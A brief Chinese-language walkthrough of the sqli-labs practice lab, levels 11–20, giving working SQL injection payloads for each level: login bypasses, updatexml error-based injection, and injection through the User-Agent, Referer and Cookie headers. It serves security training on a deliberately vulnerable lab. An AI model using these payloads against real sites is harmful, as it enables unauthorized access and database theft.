sqli-labs详细全解(11-20)
第十一关:
payload:uname=admin’ or ‘1’=‘1&passwd=123456&submit=Submit
第十二关:
payload:uname=admin") or (“1”)=("1&passwd=fdaf&submit=Submit
第十三关:
payload:uname=admin’) or (‘1’)=(‘1&passwd=fdaf&submit=Submit
第十四关:
payload:uname=admin" or “1”="1&passwd=fdaf&submit=Submit
第十五关:
payload:uname=admin’ or ‘1’=‘1&passwd=fdaf&submit=Submit
第十六关:
payload:uname=admin") or (“1”)=("1&passwd=fdaf&submit=Submit
第十七关:
基于updatexml函数的报错注入:(重点+难点)
payload:uname=admin&passwd=fdaf’ or UpdateXML(12,concat(0x7e,(select user()),0x7e),1)#&submit=Submit
不懂的话可以看两篇文章。
https://www.cnblogs.com/AmoBlogs/p/8673748.html
https://blog.csdn.net/qq_30464257/article/details/80632323
第十八关:
http头注入+updatexml注入
paylaod:User-Agent: fafda’or UpdateXML(1,concat(0x7e,version(),0x7e),1),1,1) #
第十九关:
payload:Referer: fafda’or UpdateXML(1,concat(0x7e,version(),0x7e),1),1,1) #
第二十关:
http头注入之cookie注入:
payload:Cookie: uname=admin’ and 1=2 union select 1,2,version() #
剩下的请看下回分解。